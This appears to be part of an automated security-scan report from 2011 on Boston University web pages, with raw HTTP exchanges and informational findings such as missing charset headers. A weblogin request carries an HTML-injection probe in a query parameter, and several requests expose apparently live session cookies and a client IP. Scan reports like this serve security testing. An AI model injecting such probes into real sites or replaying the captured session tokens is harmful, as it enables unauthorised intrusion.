X-BU-Main-Uniqueid: ToyYNwrxHD4AAFEANUgAAAKM
X-BU-Duration: D=361723
X-BU-Backend: builtin (null)
Connection: close

<!-- ----------------------------------------------------------------
This was generated for
at Wed Oct 5 13:47:36 2011
...[SNIP]...

11.13. https://www.bu.edu/phpbin/telegraph/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /phpbin/telegraph/

Request

POST /phpbin/telegraph/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: https://www.bu.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bu.edu/alumni-forms/forms/giving/online/index/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

form_location=%2Falumni-forms%2Fforms%2Fgiving%2Fonline%2Findex%2F&form_filename=index.html&form_configuration=donate.xml&first_name=&last_name=&address=&city=&state=n%2Fa&country=United+States&zip=&p
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:01:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d PHP/4.4.9
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybcgrxHDYAAEnbg64AAAQM
X-BU-Duration: D=1007362
X-BU-Backend: http://webapps-881.bu.edu:180 (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 59702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

11.14. https://www.bu.edu/tech/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/about/

Request

GET /tech/about/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:24 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:20:00 GMT
Accept-Ranges: bytes
Content-Length: 67007
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:24 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQArxHDYAAGUNvSUAAAMM
X-BU-Duration: D=8774
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

11.15. https://www.bu.edu/tech/accounts/wireless/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/accounts/wireless/

Request

GET /tech/accounts/wireless/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://netreg.bu.edu/faq.cgi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:37 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 17:59:36 GMT
Accept-Ranges: bytes
Content-Length: 69132
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:04:37 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybCQrxHDYAAEY9TssAAAIA
X-BU-Duration: D=9325
X-BU-Backend: niscms http://wwwcms02.bu.edu
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

11.16. https://www.bu.edu/tech/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/contact/

Request

GET /tech/contact/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:23 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPwrxHDYAAGJWsScAAAFN
X-BU-Duration: D=366081
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

11.17. https://www.bu.edu/tech/feed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/feed/

Request

GET /tech/feed/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:28 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 18:17:42 GMT
ETag: "999deaaf7fef0449c165077299c01d7a"
Content-Type: text/xml; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiRArxHDYAAGUMuo8AAAKJ
X-BU-Duration: D=224232
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

11.18. https://www.bu.edu/tech/policies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/policies/

Request

GET /tech/policies/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:27 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:19:59 GMT
Accept-Ranges: bytes
Content-Length: 68846
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:27 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQwrxHDYAAGUNvWMAAAMB
X-BU-Duration: D=8720
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

11.19. https://www.bu.edu/tech/projects/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/projects/

Request

GET /tech/projects/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:26 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:20:00 GMT
Accept-Ranges: bytes
Content-Length: 66854
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:26 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQgrxHDYAAGJVrYoAAAHY
X-BU-Duration: D=10295
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

11.20. https://www.bu.edu/tech/service/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/service/

Request

GET /tech/service/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:25 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:24 GMT
Accept-Ranges: bytes
Content-Length: 67216
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:25 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQQrxHDYAAGUMumgAAAKZ
X-BU-Duration: D=11105
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

11.21. https://www.bu.edu/tech/services/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/alumni/

Request

GET /tech/services/alumni/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:22 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPgrxHDYAAGUMulEAAAKP
X-BU-Duration: D=386473
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

11.22. https://www.bu.edu/tech/services/departments/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/departments/

Request

GET /tech/services/departments/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:21 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:20 GMT
Accept-Ranges: bytes
Content-Length: 108281
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:21 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPQrxHDYAAGJWsQ4AAAFU
X-BU-Duration: D=10019
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

11.23. https://www.bu.edu/tech/services/faculty/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/faculty/

Request

GET /tech/services/faculty/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:16 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:28:52 GMT
Accept-Ranges: bytes
Content-Length: 105352
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:16 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOArxHDYAAGJWsOoAAAFG
X-BU-Duration: D=8712
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

11.24. https://www.bu.edu/tech/services/researchers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/researchers/

Request

GET /tech/services/researchers/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:18 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:17 GMT
Accept-Ranges: bytes
Content-Length: 98337
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:18 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOgrxHDYAAGJWsPgAAAFY
X-BU-Duration: D=9158
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

11.25. https://www.bu.edu/tech/services/staff/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/staff/

Request

GET /tech/services/staff/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:19 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:18 GMT
Accept-Ranges: bytes
Content-Length: 104691
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:19 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOwrxHDYAAGJVrSYAAAHG
X-BU-Duration: D=23961
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

11.26. https://www.bu.edu/tech/services/students/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/students/

Request

GET /tech/services/students/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:16 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:28:45 GMT
Accept-Ranges: bytes
Content-Length: 92477
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:16 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOArxHDYAAGUNvMsAAAMY
X-BU-Duration: D=10392
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12. HTML does not specify charset  previous  next
There are 10 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


12.1. https://weblogin.bu.edu//web@login3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   //web@login3

Request

GET //web@login3?jsv=1.5p&br=un&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:03 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYUwrxHDsAAEIXd9Q
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:48:03 GMT
Set-Cookie: wl4cap=1317836883%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyYUwrxHDsAAE4ID5sAAAAF
X-BU-Duration: D=167725
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2729

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...

12.2. https://weblogin.bu.edu/web@login3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3

Request

GET /web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:54 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYwgrxHDsAAFl@RhA
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:49:54 GMT
Set-Cookie: wl4cap=1317836995%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyYwgrxHDsAAFiBZSsAAABF
X-BU-Duration: D=910450
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2758

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...

12.3. https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1

Request

GET /web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/directory/change-entry.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:01 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToyYUQrxHDsAAEIXd9A
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:48:01 GMT
X-BU-Main-Uniqueid: ToyYUQrxHDsAAFC0OSgAAAAR
X-BU-Duration: D=101903
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

12.4. https://weblogin.bu.edu/web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881

Request

GET /web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ezproxy.bu.edu/login
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
